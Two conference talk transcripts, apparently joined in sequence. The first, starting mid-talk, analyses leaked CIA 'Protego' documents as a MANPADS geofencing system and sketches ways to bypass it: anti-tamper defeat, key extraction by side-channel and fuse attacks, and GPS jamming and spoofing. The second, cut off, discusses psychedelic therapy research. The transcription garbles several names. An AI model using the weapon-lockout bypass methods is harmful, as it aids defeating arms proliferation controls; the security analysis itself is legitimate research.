place. Why would the CIA want something like this? And I must add that this is obviously speculation based on very few documents, but I do think it is a more plausible hypothesis than the one that is currently out there. Well, if you've been following the news a little bit, especially around the terrible Syrian situation, after the situation deteriorated, many of the rebels started facing serious air power, both by the Syrian army as well as by Russian allies. Because the US has a vested interest in opposing the Assad regime and the Russians have a vested interest in supporting it, a situation emerged where voices started calling for maybe supplying these rebel forces with manpads to counter this kind of air power. Now this does come with some problems, especially if you're aware of the history of supplying manpads to what I'd like to call less than trusted third parties. Man on the right went on to become very famous. So during the end of the Cold War, the Americans, they sent stinger missiles to the Mujahideen in Afghanistan to counter Soviet air power that did end up working. But the problem is that you then had the proliferation of this kind of powerful technology among parties that went on to be not exactly allies. So people started talking about maybe implementing technical use controls in these kind of systems, using GPS for example, to limit the use of these stinger missiles to a particular time and place to counter proliferation. I think the most sensible candidate for something like this to have been developed is what came to be known as the Timber-Sikamur program. So Timber-Sikamur was a CIA program to supply Syrian rebels with weapons and training from 2012 to 2017. Basically in all the official communication that followed after its disclosure, manpads were barred from the program, but there have been sources that claim that small batches of manpads have made it to rebel hands in Syria. Now I have to say it is unclear to me whether Protego was a part of this program, whether it was even fielded, maybe it was just developed and never actually fielded, but I do think this is a very good candidate for the kind of technology that you can see on those documents. So what is the Harry Potter connection? Well it is mainly in the name, and the name is another giveaway for the functionality of the system. So within these documents two names come forward from Harry Potter, the Devil Snare name and Protego, and essentially Protego is a charm that protects the caster with a shield spell and the Devil Snare is a magical plant that constrains someone to a certain position, you know, nice metaphor for a geofence. So let's take a look at a little bit of technical analysis to delve into that. This is the actual block diagram from the documents, so if anyone with clearance is in the room, sorry. There's three main microcontrollers there, the main processor on the left, the tube smart switch in the middle, and the missile smart switch on the right, which are all PIC 16 bit microcontrollers. I put some additional terms on there like AT, which stands for anti-temper, IB, which stands for in-border, EOM, which stands for end of mission, and then there's talk of the sigma dot, which is missiles terminology for a tracking signal. Now this is the heart of the smart fence and how it works. So the way these manpads work is that the missile after the seeker has found a potential target, sends the sigma dot signal over a wire to the grip stock, where the actual calculations need to be done by the targeting electronics. So what the smart fence mechanism does is it ensures that this switch is default open, so no signal goes from the missile seeker to the grip stock unless certain conditions are met. And that's the whole core of the system. It closes only after these conditions have been met and otherwise not. So how does that work? Now you can see this on this sequence chart. After the conditions have been met, after the BCU has been inserted, it sends an encrypted signal to the tube smart switch to say set audio switch on, which is terminology for close the smart switch, and it then forwards it to the missile smart switch, which ensures operationability. And the protection of the system relies on the fact that these channels for these communications, which is an internal serial bus, are encrypted and as such require the presence of keys, which is why they included key eraser functionality. So when do these keys get erased? After you enter the border once, so you go to the target where you want to deploy your system and you enter this geo fence border, then the keys get erased if you detect an anti-tempering event, you detect low batteries, or if you go out of the border or the mission ends. And then the main processor key as well as the tube smart switch keys are both erased. They're also erased if a missing missile is detected, so if you remove the missile from the tube. So these are the status indication LEDs, and I think these would be mounted on the suitcase and they indicate the status in which the missile is in. Why is this probably there? Because operators need to know the system is good to go before running up to an aircraft and then figuring out, oh, it doesn't work too bad. This is the message format. It's not terribly important, but this is sent over the serial buses. The inner core of the message, which is 1 to 8 bits, is encrypted. Unencrypted messages are allowed, but only for one message type, and that's the case if the nonce is set to zero. So these are the messages that are sent between this programming box and the Prutigo subsystem, and the only interesting ones, in my opinion, are the ones that allow you to reprogram the main processor or change the beacon state configuration or enter tactical mode. And these are the messages that are sent internally between the microcontrollers, closing the audio relay, detecting anti-tamp ring, missile missing, that kind of stuff. So let's do a brief security analysis, and I have to say that this is, again, hypothetical because the CAA did not provide me with any missiles, so I'm going to be talking at a very high level, but this is the general attack plan that I would imagine people attacking these kind of systems going through. Actually this is what the Prutigo life cycle looks like. So you start by programming the device with key material, which is loaded into the firmware images, you switch it to storage mode, then you ship it to a covert facility in or near the theater of operations. The programming box, which I imagine to be handled by a CAA officer, is then used to configure the G on the time fans, which is requested by this less than trusted third party. It enables tactical mode, you hand it over to these guys, and then if it is stolen, it's rendered inoperable outside of the fence conditions, or if the mission period expires without use, you return it to the facility and you can set it again for another go. And this is the cryptographic architecture underpinning it, and you can really make up a lot of this out of the documents. So the keys are generated using a key gen application, they're written into the firmware images. The programming box itself does not contain any keys, maybe it queries them from some kind of back end, maybe they're entered using some kind of a key loading device, it's unclear to me. The keys that are loaded into the Prutigo system consist of a one single 128-bit key, which is shared between all the microcontrollers on this manpets. The missile smart switch key never actually does get erased. And interestingly, there is one maintenance key. So they mentioned that there is a maintenance key that's embedded in the firmware images, which is identical for all the Prutigo instances. So not just one manpets, but all the missiles. Why is this the case? Well, I think that if you have an event which erases the keys, for example, the expiry of the mission period, then you still need to be able to reconfigure a new mission period. And if there's no keys, you cannot communicate over this programming interface. So there's probably a maintenance key that exists as a fallback, that if the actual mission key is no longer there, you can still reconfigure this new situation. But from a security point of view, having a global maintenance key among all these manpets is not a good idea, in my opinion. So what does the attack surface look like? It looks like something like this. You might go for attacking the GPS. You might go for physical tampering. You might try to extract or modify the keys or the system logic. So if we were to go for physical tampering, these would be the most likely candidates, in my opinion. You might try to mess with the beacon interface signals, or try to cause a default true evaluation regarding of the actual fence conditions. Or you might try to target with the smart switch itself by ensuring that it's normally closed, regardless of the fence conditions. Now in these kind of systems, there's bound to be anti-temper measures, obviously. So these might consist of things like metal shielding, or they might consist of encapsulation into coatings that are resistant to tampering or might cause damage to the components. You should try to remove it. There might be light sensors. So as soon as you open up the device, it triggers an anti-tempering event, or as soon as you apply a certain kind of pressure to the PCB, it might ensure that the keys are erased, and there might be active meshes there, which is essentially a grid of very thin wires that as soon as you break them or you short them, cause an anti-tempering event. And these might exist at an IC level, but they might also exist at an enclosure level, or they might be woven through the encapsulation to make things even worse. Now there's many well-explored invasion techniques, also via the IC back side, which I will not explore in this talk, but I think one of the most interesting things here is that the keys are stored in flash and not in battery-backed SRAM. And that's interesting because if an attacker can bypass enough anti-tempering measures to be able to cut the right enable line to the flash, they might at a later point be able to prevent erasure if the keys are stored there. The issue for an attacker here is that these kind of methods are quite knowledge and capital intensive, and you're also working on a system with an active warhead in there, so that's probably nerve-wracking. The bigger issue in my opinion is that these secret signals might be unencrypted, and if they're unencrypted, that would mean that even if I open up the device and I ensure that the smart switch is default closed and the keys are erased, then it might be possible for the secret to still get a lock on and get the firing signal from the grip stock. So I'm not sure if this is the case, but if they are unencrypted, that would not be very good. So I'm not sure how hard tampering with that switch is. It's just speculation, but there's nothing indicating that these signals are encrypted as well. Then there's the route of going logical tampering. So we want to bypass the fence, and in this rough attack tree, you can see that we can either try to change the fence parameters, we can try to reprogram the main processor firmware, or we can try to attack the GPS. So let's try to explore what's involved here. Now in both cases, we will need to first understand the protocol, because, well, we understand it from the leak documents, but in an ideal situation an attacker would not. So we would have to reverse engineer the firmware, which we would have to be able to extract, either from the Prutigo system itself or maybe from the programming box, but that's not very likely because then we would have to steal it from a CA officer. The same goes for obtaining the keys, which you would either have to extract from the microcontrollers or, again, the programming box. Now I think that the conclusion here is that most of these approaches will likely require you to sacrifice at least one manpads for research and then try to generalize it to other manpads that might be in your possession. So when trying to extract or modify the keys and firmware, there's four main approaches. You can go for the debugging interfaces, you can go for side channel analysis, you can go for invasive attacks, or you can go for exploiting software bugs. Now some of these approaches might trigger anti-tempering measures, but the maintenance key never gets erased, and it's global, so if I'm capable of extracting this, that's a very interesting route to go down. These are the debugging interfaces for the microcontrollers that are used in Prutigo. The PIXIS 16-bit, which uses in-circuit serial programming, and you can use that to read or write to internal memory. Now there is an issue, Microchip does have Code Guard, which is its own readout and write protection. It is configured via fuses in the microcontroller, and a violation of its policies will trigger a security reset. And it offers three levels of segmentation. You have the boot segment, where you have your secure bootloader, then you have the secure segment, where you can put secure ISRs or small lookup tables or something like that, and then you have the general segment for all the rest. The privileges go from high to low there. Now this is the memory layout of the Prutigo microcontrollers. You have the firmware in the executable flash, and that's essentially checked with a version number and a 16-bit CRC during startup. After that you have the key and the key number, which is also checked with a checksum, which is also CRC. And what's really interesting to me is that there's no mention of firmware authentication whatsoever here. There's no mention of a hardware root of trust or a secure element. There's really nothing beyond Code Guard. That's the core protection here. An interesting disclaimer from Microchip is that regarding Code Guard, there are dishonest and possibly illegal methods used to breach the code protection feature. Imagine that. All of these methods, to our knowledge, require using the Microchip products in a manner outside the operating specifications contained in Microchip's data sheets. Most likely the person doing so is engaged in the theft of intellectual property. Well, that's very confidence inspiring. So the microcontrollers that are used in Prutigo only offer Code Guard basic, which only supports a single general segment for read and write protection. So there's no separate segment for bootloaders or keys or whatsoever. I didn't delve into Code Guard security in depth for the newer microcontrollers of PIC because I didn't have the time for that. But interestingly, older families' code protection suffered from what they called the Heart of Darkness attack. What you basically did here is that you could erase the memory on a per block basis and that would reset the security settings only for that block. So for the first block, the boot block, you would override it with a dumper and upon execution that would dump the rest of the microcontroller memory and then you would at a later stage override one of the other blocks in another known good and then dump the boot block that way and you would be able to extract it. I'm not sure if that applies to these microcontrollers as well, but might be an interesting avenue of approach. Another way to try and obtain the keys would be using side channel attacks. I'm not going very in depth here. I'm assuming people are familiar with simple differential and correlation power analysis. Interestingly for the PIC microcontrollers, the ones that they chose here is there's no hardware crypto and there's no hardware-based side channel countermeasures there. There's probably in my opinion also no software countermeasures like blinding and masking or anything like that because they might affect power consumption in an adverse manner. That's an issue for Protego because there are extreme power constraints here because you only draw power from the BCU or a battery that is in the Gripstock. In this case, you would target the maintenance key, extract it and then apply it again to a different man-pads. Invasive attacks would be another route. The PIC microcontroller families, I believe 12 and 18 suffered from an attack where if you de-capped them down to the dye level and you shown UV light on the floating gate, you would be able to reset the security fuses and quite reliably because the fuses were quite far away from the rest of internal memory. This apparently applies as well to the PIC 24s. I've never seen a public write-up but when Googling this, there was a Chinese company offering the capability to bypass readout protection on these microcontrollers. I believe that that would probably be an approach like this. If that applies, that's quite serious. Then there's the route of software vulnerabilities that would be using a memory corruption bug or a state machine logic bug in order to either exfiltrate the cryptographic keys or maybe try to send a close message while it should not be sent. There's very little to say about how applicable this is but there are software change requests with leak documents and they mention things like when BCU power is applied and the missing missile is active, the erase does not occur. They caught stuff like this but if bugs like that slipped into production, attackers might be able to exploit it. I don't think this is a very viable approach for the kind of attackers that would be going after this because the attack surface that is exposed on a software level is very minimal and doing any kind of full black box vulnerability research or exploit development here is hellish so you would need to be able to extract the firmware anyway. I don't think this is a very viable route. What's more viable in my opinion is attacking GPS because the core security decision of Pratigo is based on GPS derived info, location and time. For those unfamiliar with GPS, GPS is part of a set of systems known as GNSS, global navigation satellite system, Russian GLONASS, the European Galileo and the Chinese Baidu. Pratigo in my opinion probably uses the plain core acquisition codes because in GPS you have five bands and the L1 and L2 band consist of a core acquisition civilian code and an encrypted precision code for military systems. I don't think Pratigo uses that because that would mean that the system needs access to these military cryptographic keys and you don't want that in a system like this because it needs to be handed out to a less than trusted third party and it also does not aid plausible deniability. So that means it uses plain signals. Threat number one here would be GPS jamming because if the GPS is unavailable, maybe key erasure does not occur or even worse for the people using these missiles, if the GPS is unavailable, the manpets won't fire, which is quite interesting for opposing air forces here. Now a naive approach would be to use just overpowering noise on the L1 and the L2 bands, but this might be detected through signal anomalies or it might be corrected for. For example, through using multi-source correlation from different GNSS systems, using noise filtering, stuff like that, and that might trigger key erasure. So instead you might want to go for a smart GPS jamming approach where you combine your jammer with info from the GNSS system and then you trigger short and spart bursts which are aligned with specific portions of the message, such as the preamble, the time mark or the CRC, and that's far harder to detect. Another approach to attacking GPS would be using spoofing because GPS is an unauthenticated and weak signal which allows for replay or forging and that's become much easier over the years through commercial and SDR solutions. So you would collect an infant signal, move the manpets to a faraday cage and then continue replaying it in a loop. Now again there could be countermeasures here such as detecting anomalies in signal strength, latency, loss of lock, using multi-source correlation or using an internal reference clock to detect jumps in time. I do think there is an issue with implementing stuff like this in Protego because active countermeasures would again drain power here. So an attacker that would try to bypass stuff like this would try to use a carry-off attack where you try to carefully align the spoofed signal and gradually increase the power over time to take over the signal without causing a loss of lock or triggering these countermeasures. So it's not unovercomable. Conclusion. This does not only apply to Protego. Everything I said is essentially embedded system security 101. This applies to all kinds of geofencing solutions like theft prevention in armored trucks, ankle monitors, UAV area denial and livestock management. So you might in the future see cyberpunk cattle rustlers using technology like this. Is any of this stuff a tech in practice? Well yes, especially through GPS jamming because it's very accessible. You don't need a lot of technological knowledge. You spend 10 bucks on AliExpress and you buy a jammer and then you use it, for example, as a car thief or a cargo thief, which does happen. In conclusion, Protego, I don't think it is a GPS guided aircraft assassination module. I think it is a manpads geofencing solution for a covert arm supply program. It's unclear to me where, when or if it was ever fielded. Timber Sycamore would have been a good candidate. And interestingly, it utilizes commercial off the shelf technology in a similar fashion to commercial systems. A geofence is a geofence. Impossible Achilles heels here would be the unencrypted secret signals, a lack of secure boot and firmer authentication, the existence of a global maintenance key, and its reliance on civilian GPS without any clear electronic warfare countermeasures. And that's it. If you have any questions, you can ask them now or ask them over Twitter. Thank you very much. You all know the procedure. We have eight microphones in the room, so please line up behind the microphone. Or also you can ask questions on the internet and our awesome signal angels will relay the questions into the hall. Right now we have one question at microphone number four. Please go ahead. Hi. Thank you for your talk. When the device uses the military version of GPS, is GPS spoofing then still possible? I'm not sure about it because I haven't looked really into the details of like the precision codes. I have read articles that it would still be possible in some scenarios because of the way key management happens there, but I can't really answer that question in detail because I haven't really investigated that. All right. We have another question at microphone number two over there. Please. Hi. Thank you for the presentation. I was wondering, you talked about GPS spoofing to keep the system working. It seems like there's a very practical attack where you could disable the man pads by spoofing GPS and pretending to be outside the fence when it's actually still inside. Yeah. I think like if the attacker model is not a less than trusted third party trying to take these man pads and use them against civilian airliners, but instead from the perspective of the man pads user, the adversary would be a opposing air force, then using simple GPS jamming would be sufficient to ensure that these cannot fire, which in my opinion is a little bit iffy because GPS jamming is not that hard. All right. Another question at microphone number four. Go ahead, please. Yeah. Thank you very much. I actually have two questions. So first is like, okay, well, you found the documents, so actually what motivated you to do all of this research? You know, like it's a lot of work, like the documents which you found, analysis which you've done, and you are a very busy person. So it's a lot of work. That's question number one. And question number two is all of these designs which you've been showing like key management, security decisions, design of this like of the electronics, how does it compares to you to all the industrial equipment you looked at? Did you see what is more smarter, more intelligence, more, is it better than in the industry or not? So with regards to the first question, it's I think curiosity and using the little spare time you have to somehow still sit behind a PC. That's the main answer to be honest. And the second answer is, well, I can't really say a lot about how it compares because there is a degree of speculation in this research. Like I have looked at the documents and I can extrapolate from the security features that I know the microcontrollers to have and stuff like that. So it's hard to compare definitively, but it would say that the interesting thing is that the microcontrollers used are not secure microcontrollers. They do not have a secure element. They are not intended for high security purposes. And I'm not sure why they chose these. Maybe it's because this was only during a development phase. Maybe it was because of the power consumption constraints, but it would not be my first choice. I would say, yeah, it compares badly in a sense. All right, we have a question from the internet. Go ahead, signal Angel. Do the rebels in these conflicts have reasonable access to the resources needed to crack the system? I'm sorry, I didn't quite get that. Would the less trusted parties have resources to crack something like this? Well, they would have now. I think that's the problem. To be honest, these less than trusted third parties, these are not stupid people. I don't think these are people who have the kind of resources for doing really invasive attacks with focused IM beams and God knows what. But GPS spoofing and GPS jamming are not complicated attacks. They're relatively easy to figure out. And as soon as you know this is a system that works on the basis of GPS, which is not hard to figure out, you can try to develop an attack like that. So I think even without these leaks, fielding a system like this is, I don't think a very good solution to that proliferation question. So I think getting around this kind of stuff, if it works, like the documents seem to hint that it works, yeah, they could probably get around it. All right, signal Angel, do you have anything else from the internet? Nope. Okay, then thank you very much for this great talk. Thank you.
In this talk we will take a look at the 'Vault 7' Protego documents, which have received very little attention so far, and challenge the assertion that Protego was a 'suspected assassination module for [a] GPS guided missile system ... used on-board Pratt & Whitney aircraft' based on system block diagrams, build instructions and a few interesting news items. In addition, we will discuss hypothetical weaknesses in systems like it. In March 2017, WikiLeaks published the 'Vault 7' series of documents detailing 'cyber' activities and capabilities of the United States' Central Intelligence Agency (CIA). Among a wide variety of implant & exploit frameworks the final documents released as part of the dump, related to a project code-named 'Protego', stood out as unusual due to describing a piece of missile control technology rather than CNO capabilities. As a result, these documents have received comparatively little attention from the media and security researchers. While initially described by WikiLeaks as a 'suspected assassination module for [a] GPS guided missile system ... used on-board Pratt & Whitney aircraft', a closer look at the documents sheds significant doubt on that assertion. Instead, it seems more likely that Protego was part of an arms control solution used in covert CIA supply programs delivering various kinds of weapons to proxy forces while attempting to counteract undesired proliferation. In this talk we will take a look at the Protego documents and show how we can piece quite a bit of information together from a handful of block diagrams, some build instructions and a few news articles. Finally, we will discuss the potential weaknesses of such 'lockdown' systems which have been proposed for and are deployed in everything from theft prevention solutions and livestock management to firearms control and consumer UAVs.
10.5446/53189 (DOI)
Let's come to the talk. So next up is Andrea Jungabeler. She is talking about drugs and how drugs affect the psychiatry, or this hard word. Why don't you do it? I know now. And the question is after the... What is for board in English? Prohibition. Ah, prohibition. Right. After the prohibition in the 70s, not much thinking about how these drugs work and how could they improve psychiatry has been done. So now everybody is asking, is this the magic bullet cure? I don't believe so, but more about this by Andrea. One welcome please. Hello everybody. I'm very happy to be here and able to talk to you on a topic that is very important to me and I think very important to many people now and in the future. So the topic today is psychedelic medicine, hacking psychiatry. And just to give away the punchline, it's not a magic bullet and it will never be. But on the other hand, there are lots of things to know and think about in this context that I would like to introduce you to. But first a few words about myself. I'm a medical doctor, specialized in emergency medicine intensive care. I work and live in Berlin. And I'm also one of the founders of Mind, the European Foundation for Psychedelic Science and its current medical director. One more sentence about us. That's our core team. And also Mind is a members-based psychedelic science association. We have around 450 members worldwide and a core team of about 50 people. That is a nucleus of paid staff, lots of very dedicated, very good volunteers and great interns from different disciplines like the neurosciences, psychiatry, psychology and pharmacology for example. So we work to establish psychedelic science as an evidence-based method and also educate about it in Germany and Europe around it. Okay, but let's dive in at the deep end. Psychedelics. What are psychedelics? Well, the term comes from the Greek, psychedelos, which could be translated as manifesting the mind of the psyche. So mainly we're talking about psychoactive substances with a certain capability of transforming one's perception, introspection, sensory qualities in a very typical way that is sometimes described as dreamlike, but not necessarily so. The classic psychedelics that are also called hallucinogens, which I don't like as a term because they don't induce hallucinations. What they do is induce pseudo-halosination. So somebody on a psychedelic substance usually in 99% of the time is aware that they have taken a substance and what they're experiencing is due to the substance. So it's not a hallucinogen but a pseudo-halosinogen. But these substances like the classics LSD, psilocybin or DMT function in a very specific way and they all are working on the certain allergic system. So serotonin is one of the key neurotransmitters and there's one receptor, which is the 5H2-2A receptor, which is like the smallest common denominator of all those substances, which doesn't say that they all work just on this one, but they affect a whole plethora of neurotransmitters and receptors, but this is the key where they all work. There are other substances that are classified as somehow psychedelic like the intactogens, exosy-MDMA is one of the kind which works also on the serotonin system, the so-cities like ketamine who work more on the NMDA receptor, and some others that are just basically chemically random like aminita, which is fly agaric mushroom, auditora, or salvia. Okay, this is the only slide I'm going to bother you with this dry kind of science, but I think it's important to be clear about this because even though psychedelics are a pop-cultural meme, hardly anybody knows anything about it to be honest. Most people associate them with being drugs of the same danger profile as methamphetamine or opioids think there is an addiction factor which in fact does not exist with classic psychedelics. And basically it has been the dirty corner of perception for many people for a very long time. Recently things have changed a bit. Psychedelics have come mainstream, firstly because there is a perceptions shift on drugs in general due to the cannabis, perception and medication changing, and also because people like for example Michael Pollan who is a classic mainstream author writing on cooking and nutrition have turned to writing about psychedelics. And another factor that has helped psychedelics in one way and harmed them in another is the whole microdust dose in craze we have seen, especially in the tech and developmental scenes and especially in the Bay Area and Silicon Valley. Okay, but where do they come from? In this talk I am not going to speak about psychedelic psychoactive substances in other cultural frameworks. There are cultures like in the Amazonian basin or some Mazatec people in Mexico who have been using psychoactive substances, psychedelics in a very ritualized sense for millennia perhaps, at least centuries. But this is not us. So let's talk about what happened here in Europe or in the western world including America. This guy up here, sorry, that's the wrong one. The pointer isn't strong enough, we worked like this. This nice guy up here is Albert Hofmann. In 1938 he was developing several substances that were supposed to work on atonia in postpartum women but also on other problems like blood pressure and he among other things developed the thing that later became LSD. But back then he didn't see any sense in pursuing it medically because it didn't work the way he wanted it to and he shelved it. And for some reason in 1943 he took it out of the shelf again to retest it for other purposes and accidentally gave himself the first noted LSD trip. This happened not because it was a shittie chemist but because the amount that is needed to induce an effect is so low as it has never been noted before in any other substance. So 20 micrograms of LSD can already produce a notable change in perception. So when he came out of that experience, this first one he had after accidentally dosing himself, he decided to go for a trial on himself. And trying to be safe, he used what he thought was a very low dose of the substance he discovered which turned out to be 250 micrograms of LSD which was his... I hear the laughter, you know, it's rather a high dose trip especially for somebody who just didn't know what was expecting him out there in his own mind. And this is the famous bicycle day trip where he rode home on his bike thinking that the world was collapsing around him basically. So even this wasn't a nice trip, the first one. What happened next was that he reported to his superiors as Zandu chemical in Basel and they had the idea of turning this into a substance for mainly doctors, psychiatrists, psychologists to experience what it would be like to be psychotic. So its first application of LSD was as a psychotomimetic. And as a psychotomimetic, thousands of dosages were distributed worldwide from the Czech Republic to Harvard University to everywhere and doctors tried it out. What happened then was that a small group of young, ambitious psychologists around Timothy Leary tried it out too and thought this is not just something for doctors, this is not just a psychotomimetic and brought it out basically into the real world and people were experimenting with LSD quite a bit in the 60s before it was forbidden in 71. Not because it turned out to be so dangerous. There were not so many accidents, not so many people had dire side effects, but because the political will to cope with this substance and its implications wasn't existing in the Nixon era. So 71 underground it goes into subculture. But the ginny was out of the bottle. It was not going to go back in and psychedelics, not only LSD but also well, Cytocybin later on MDMA and these days more than 500 new psychoactive substances that have been brought up on the black market are around us and people use them. It's a societal reality that our juridical system doesn't keep up with to be fair. So it's been in many subculture settings from people just going dancing and having a good time to self exploration to pseudo shamanic or shamanic settings. And I think most people will at least know somebody who has experienced like at least once. And then something else changed. A few years ago, let's say 10-ish, 10 years ago, psychedelics started coming back. There had been research, for example, at the University of Zurich around psychedelics before that already. There had been trials before. And the big comeback of substances like Cytocybin, LSD and MDMA as tools to augment psychotherapy was within the last 10 or 15 years. So these people up here are some of the people worldwide working with these substances trying to develop them into medications. So not over the counter, but prescription medications to be applied within the setting of psychotherapy. So the idea is never that somebody can walk into a pharmacy saying, oh, I'm depressed. I want to buy Cytocybin to treat myself, but to have a structured therapeutic session in which the effects can be contained and the benefits enhanced. So the ones that are most promising these days are Cytocybin for depression, which is already heading for the third stage, third and final stage of improvement as a medication within the USA and consecutively, hopefully in Europe. And MDMA is what people wanted to find if they buy ecstasy, not that they always get it, but MDMA is the substance they're trying to get for post-traumatic stress disorder. So in the US, even the Veterans Association has jumped on the bandwagon and has spawned this research, which is interesting at least. But isn't that harmful? Oh, these substances are very dangerous. Well, not in the way you think and not as much as you might think. This graphic up here is something that was put together by a group of 40 experts who discussed what substances have what harm on the user and what harm on the people around the user. So for example, alcohol is harmful for the person, giving them liver disorder, making them addicted and so on and so on. But also because people get aggressive when they use it or drive dangerously, for example, when they're intoxicated, it's dangerous to others. If you check out, I have to walk over here now, sorry to the camera people. The substance we're talking about for treatment are not up there with the very dangerous ones. We have the shrooms down here, the LSD is there, ecstasy is there. So very low danger to the user and almost no danger to other people. If you compare that to alcohol, heroin, tobacco, it's all up there. And to be quite fair, we are all part of a giant field study anyway. Because these substances are being used. This is dated from the 2017 Global Drug Survey, which is a self-reporting study where people talk about their own drug use and fill in forms online. This is not a statistically sound sample of the general population because to fill out that trial, you have to have a certain interest. But the people that have filled this out, we're talking about a number of over 115,000 worldwide say that they have in their lifetime partially used LSD. Where the number is, MDMA mushrooms in LSD, so MDMA 35% mushrooms, almost 25% LSD over 22%. And if you look around you, of how many people do you know who ended up in an emergency department or in a psychiatric ward due to only using those substances. Actually, looking at this giant field study that the legal market has provided us with, it seems to be rather safe. Because these people are not using clear dosages of a clean substance and still there's hardly anything happening. Okay, but what about micro dosing? Well, we don't know much about micro dosing in fact. There are no scientifically randomized controlled studies as to yet. The first ones are just starting. There are self reporting studies where people have filled out online forms. And it seems to be that what people are on one hand trying to achieve is yes, enhancing creativity, getting better work performance. But a lot of them are trying to treat, cure, enhance their latent or apparent depression. And the other thing is micro dosing, which is defined mostly as using a very low, almost subliminal dose of a psychoactive substance such as LSD, is being done by people with all sorts. There are people micro dosing MDMA and ibogaine, which is, if you look at the receptor profile, it's just insane basically. And frankly, can't do what they hope it does. And when we look at people who micro dose, we can't say how much of the effect they're feeling is really from micro dosing that substance. Or if we have a top notch first grade placebo effect going on where people feel much better because they have taken this and believe in it. Let's not turn down placebo. Placebo is extremely valuable medically. It's actually shown that placebo effects, for example, enhance the endogenous opioid production. So your body revs up towards healing, towards feeling better with the placebo effect, but this could also be done with a sugar pill. And there's one thing I just want to leave with you in this group. If anybody of you is micro dosing and has pre-existing heart condition, don't. Simply because some of the sub receptors, especially with LSD that are being activated in prolonged micro dosing for a long time, can be cardio toxic and possibly harm your heart. Just again, there's no clear data about this yet. Just to leave it with you if you suffer from a heart condition. Don't. Depression. That keyword I had with the micro dosing again as well. But let's go deeper into this. Because if we want to talk about how psychedelic medicine can really make a difference in psychiatry, depression is the first line thing to think and talk about. And why is that? Depression is a very serious psychiatric disorder. People who are severely depressed, and that's many people. Statistically in Germany, every eighth woman is likely to suffer from a severe depressive episode at one point in their life or the other. People who are depressed lose social functioning. They have very decreased life expectancy partially through suicide, partially because they don't manage to care for themselves. These people lose themselves and are being lost for others too. And there is treatment for depression, yes. But in many cases, it only has a limited capacity. And even though depression is a worldwide epidemic, with rates from 3% of the population in China to 22% of the population in Afghanistan suffering from it, there have not really been new forms of treatment for two, two and a half decades. So the stuff we're working with is partially working, partially not. About one third of patients don't react to the medication at all, even though there's different types. And those who do usually have very low rates of acceptance because of the side effects. Because many people use antidepressants and the best combination is cognitive behavioral therapy. So what is called in German Verhaltenstherapy, cognitive behavioral therapy in conjunction with antidepressants. That might work, but for some it doesn't. And those who take the medication don't feel well. It's not that they're back to normal. They're just less depressed, but usually they're like dimmed in on all sides. So they are still not getting happy. Their libido is decreased, their activity levels are decreased. People are suffering quite a bit from the side effects. It's really not nice. So I was just to tell you one little story. I told you I'm an emergency medicine doctor. And just to illustrate how bad depression can get. A few weeks ago I was being called out to an attempt to suicide. A woman had jumped out of her window on the fourth floor. We found her lying in her yard. And she was injured, badly injured, but still alive. And we stabilized her and took her to hospital. And when the nurse kind of pulled up her data in the emergency room, she went like, oh no, not again. Because this woman had jumped out of the same window just half a year before. That's how bad this disease can be. So how desperate people get. And how terribly important it is for us not to look away but try to find better new therapies. And this is, in my opinion, with psychedelic medicine. Psychedelic therapy can be a real game changer. The one therapeutic application we have the best data for is psychedelics for treatment-resistant depression. There's several studies going on in the UK, in the States, in Switzerland, but also in the Czech Republic and so on and so on. And what they seem to be finding is that even though they're still working with small samples because you have to fan out, if you try to bring out a medication like that, you have to show first that it's safe with healthy people, and then you start with a small sample of sick people, and then you enlarge it from there. And then now in this enlarging process, that's treating depression with psilocybin especially. Does not only decrease depression in those patients, but also does one great thing. It decreases anxiety. We're not only talking about state anxiety, so how anxious people are in this very moment in living their lives, but that trait anxiety, so how anxious people are as a part of their personality, which is a good thing to gauge how likely people are to relapse back into depression. People that are very anxious, very insecure about life, have a far more likely to relapse. Okay, so you see, there's a lot happening worldwide studying this. But this is Germany on that, a scientific desert. We're in the largest country, also the scientifically perhaps most important country when it comes to medical research in Europe, there's Zilch happening. There hasn't been a study on psychoactive compounds in this context forever, like 30 years. The last one on a tactigens like 20 years ago, but studying psychedelic here hasn't happened. And we want to change that. Let's... APPLAUSE So we as the Mind Foundation had a groundbreaking conference this September in Berlin at the Charité buildings. We had 600 participants, over 50 speakers from worldwide. Everybody basically, well, most, almost everybody, who's important in this dialogue scientifically was around. So from the pharmacology, the psychiatrists, the psychologists, the therapists, but also philosophers, talking about a culture of all sorts, all the states of mind have been around, and we have been trying to bring this to the German public and try to lay groundwork during new science in Germany. And what's to come next is this. With our PI, principal investigator Gerhard Gründer, who is a new pharmacologist from the University of Mannheim-Zadee, we are about to apply for the first psilocybin-depressant study in Germany this next year. So in 2020, we're putting in the applications, we've already put the first paperwork in. And what we want to do is do a double-centred study, both at the ZDE Mannheim and the Charité Berlin. Those are the two most renowned psychiatric research facilities in Germany. And it's a collaboration from the ZDE, the Charité and the Mind Foundation, each group contributing their knowledge, their capabilities, and their strengths. And what we want to do is this. We want to do a double-blind, randomized, controlled phase 2A study, big word. This basically means that it's a top-notch level internationally acclaimed study. This is how these studies need to be done to have any value. So it's double-blind, meaning that neither the patient nor the therapist know what the patient is getting. It's randomized, so this gets assigned without anybody playing around with it. And phase 2 means that it's a safety and efficacy study. So not yet dose testing and not yet comparing dosages, but just trying to make sure it works. And we are going to do that in 144 participants' samples in total in two locations, which is huge. This will be the second or third biggest sample worldwide doing this, and the first one in Germany, as we said. And what we are going to test is 25 milligrams of standardized GMP, so medical grade psilocybin, versus two active placebo. One being a small dose of psilocybin, which used to be the standard thing to do, but now talking about microdosing, what is if the small dose already does something? And testing it against another placebo that isn't psilocybin, which is some physical reaction, but is not psychedelic in this sense. So in this design, every patient will receive at least one or some two high dosages of psilocybin, so everybody who gets accepted will have his try. And the study design consists of preparation sessions, dosing sessions, where people receive either placebo or psilocybin, and integration sessions. Integration is so important. And not only in a scientific study on this topic, but if people are working with psychedelics, experimenting with psychedelics themselves, integration is the key to do something with the experience, because if you don't work with it actively, the experience is going to fade. And you might remember something about what you learned, but it will not have the impact on you, your life, and how you benefit from what you've seen and learned in that way. Right. Just one more sentence. It's mixed funding. It's funding in progress. So we have some public money coming in, but we're also looking for donations and investment just at the side. And this is almost the end of my talk. What I want to say is the following. What we try at the moment is to establish safe and legal psychedelic therapies in Germany, Europe, and the world. This is going to take time. If things go well, we might be there in five to ten years, five things go really well, and I know that it's very tempting for many people to say, well, I can just go to somebody and have a psilocybin session. I can go to somebody and have an ayahuasca session. And yes, you can, but be aware. If you do that because you're really suffering from a psychiatric disease, if you have a mental illness, if you really are in distress, be very careful with yourself. Because the thing is, you need somebody to really support you, really help you through somebody who really 